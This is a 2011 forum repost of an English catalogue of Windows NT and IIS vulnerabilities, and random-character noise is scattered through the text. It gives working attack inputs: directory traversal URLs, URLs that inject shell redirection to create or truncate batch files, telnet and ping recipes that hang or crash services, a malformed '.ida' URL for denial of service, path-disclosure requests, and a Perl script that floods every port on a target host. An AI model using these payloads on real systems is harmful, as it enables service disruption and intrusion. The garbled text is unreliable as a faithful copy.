標(biāo)題: NT的漏洞及描述(英文) [打印本頁] 作者: 雜七雜八 時(shí)間: 2011-1-13 17:12 標(biāo)題: NT的漏洞及描述(英文) 受影響系統(tǒng):4.0,iis 1.0 # j! L- a2 ~8 K% B, ?% Y1 ]! u3 S0 NA URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory. X( Y8 T( J) w! n' N3 z " U' ?0 o8 `: i$ pA URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script./ y1 ~* o( t: u1 i9 X" C" _8 L
. ^0 ]/ ~# t8 D" M" `5 aBy default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests. 2 D0 ^6 ]# q$ }7 ?* z% K2 t: {9 e5 e' W
--------------------------------------------------------------------% `1 f: r' x: C$ J4 `4 J" P, `
8 L/ r. R! z5 {+ e' e
受影響系統(tǒng):4.03 A, z# L. P* E: m, H) @
A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''. 0 g+ I4 l: G6 `/ n' v. n3 \& q1 @7 f, ~( B7 }
If the file 'target.bat' exists, the file will be truncated. + g5 l2 B) D6 Q J8 J, d ; _$ u6 r, L3 W8 o) L7 c! w" K1 ^, W" p" T3 ~
A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.6 v; b5 U' e. y# X/ Q( `
. u& a# F8 m) N; q
---------------------------------------------------------------------- 1 d4 k+ k& }+ P8 S3 x ' h+ {( H3 r" Z) n受影響系統(tǒng):3.51,4.0 6 [/ ?# Z) ^- F) YMultiple service ports (53, 135, 1031) are vunerable to 'confusion'. 2 U6 U6 K, r$ C ! E% j' p2 U8 N8 dThe following steps; $ J$ v/ z2 I$ `, L- r# M* e8 c2 s* p
Telnet to an NT 4.0 system on port 135 ; x |) j7 t" z- D- rType about 10 characters followed by a <CR> 7 W) q, e2 `/ z% W$ g
Exit Telnet 6 C( B4 `$ r, d: ~6 r0 u2 x
results in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.# B# S; _$ q: ~
5 C2 o+ ^, y! o& _. |When launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.8 |1 k; l0 o; Y4 J$ X" F
. z# H$ E A' |2 I' e( V; G
The above also works on port 1031 (inetinfo.exe) where IIS services must be restarted. ! e. P5 c' b. m! A1 r " p! e7 y* Z0 d9 m. k+ b3 o7 rIf a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning. % f' s* p4 v0 B+ ] z 3 o; I- X; V' G9 @5 MThe following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):' K1 B9 v% O6 r+ V/ _% ^
/ k: |5 {+ s9 Y8 r* `/*begin poke code*/ 0 a0 m! A1 z' U- F/ }* ^8 z# g7 p+ E' @5 N1 c9 E6 v9 P* c# S; y
use Socket;* @3 Y& r$ i! }( ^
use FileHandle;8 b9 i0 h( n4 g8 l- m
require "chat2.pl";* e* h( i2 b- y2 |( n
4 @2 t' U$ \, A. D
$systemname = $ARGV[0] && shift;; @- ]8 u8 j$ _' @1 P8 x
! X% j. d) {4 [: Y8 B" J
$verbose = 1; # tell me what you're hitting ' P! X0 v' _$ i% o( X5 [$knownports = 1; # don't hit known problem ports! @. x) R6 X k J) m
for ($port = $0; $port<65535; $port++) $ h9 a4 ?9 M) Q: I, z1 j" @2 b5 E
{ 2 J. Q4 W4 E4 |1 }! s0 K# x2 `9 B- {1 I4 a! n' J( k
) u0 W) J; Q4 X3 c8 A7 \. Gif ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {" o8 J; N: H& m
next;# a( j. S) l- g1 ]1 x: O5 G7 w
}( X3 B y0 W. `8 s! p
$fh = chat::open_port($systemname, $port); 3 M+ Z6 f' r5 Y( Tchat::print ($fh,"This is about ten characters or more"); ; _) h4 M0 M( o9 B% P. ] Yif ($verbose) { . {0 X, H8 i0 {% r' xprint "Trying port: $port\n";% C& C, b3 ~) b& p3 I/ b
} - m# [! w+ u. }+ i; G2 ^9 Xchat::close($fh); - ]% v& C1 q( r3 t. v8 ] ' w: H% O( ]7 E3 m}( L) M& n5 e( I6 |. h6 Y! u
+ r6 w' z0 H$ {" a! f) j( D
8 @# w8 q% Q4 D& y
/*end poke code*/ 5 `5 X/ i( w; G5 E0 }) n2 Q( C+ K2 |, F* W3 ?
Save the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername , [4 Z. S2 M& O. W y* o/ F: Z4 F ) @; f9 r2 G# w& w* h--------------------------------------------------------------------------------5 L5 K& [3 ]9 G- c$ @
* }! c @4 t6 K- Z6 u9 K, U+ W4 a
受影響系統(tǒng):4.0, K9 k/ t9 H9 Z6 {7 C
Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.8 p# T% C4 d: P
- g' V4 S, l. LThis attack causes Dr. Watson to display an alert window and to log an error: % z6 D! x# B3 U+ w! p ) \1 x1 B$ w% X"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"3 Z( a, h+ `3 p C
6 g0 Q4 |8 Y, u# D* B4 ]--------------------------------------------------------------------------------5 Y+ f+ }* v7 w
( N' {2 x$ D8 b& v& Z# ]受影響系統(tǒng):3.51,4.0. v' O4 X. ^5 `" p+ f8 l
Large packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:9 o! m" U" V6 \9 l+ ]' O6 ?' R8 N- W
) A2 c& m0 y: g+ ^. ]- t8 ySTOP: 0X0000001E . Q9 q; C0 l( mKMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS6 L- |% ~7 I/ o+ l! C) s
9 ^' a) M P( R4 ?2 o
-OR-% S( v* F% r. q2 n$ v9 ?7 s: w2 `
& {1 r2 q( w XSTOP: 0x0000000A ) r l2 Z2 H3 q) G! ZIRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS ( A; G9 L3 u* |' [" P- i. w8 ]7 H$ F+ D! {
NT 4.0 is vunerable sending large packets, but does not crash on receiving large packets. 8 c3 e+ L5 Q0 O* c, _( H 2 }( C) }& c. _# P2 P& H) V) d-------------------------------------------------------------------------------- * ~3 N/ E1 U5 H, A8 P6 o $ F3 `0 e& s) s/ R3 Y; ]Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure). 8 w$ D9 x0 m5 K3 ]; t
! k' R; \' y, P2 o8 {
-------------------------------------------------------- 4 ]; a' {/ l* B3 H# o0 W9 U; y( z7 Y4 W/ M
IIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server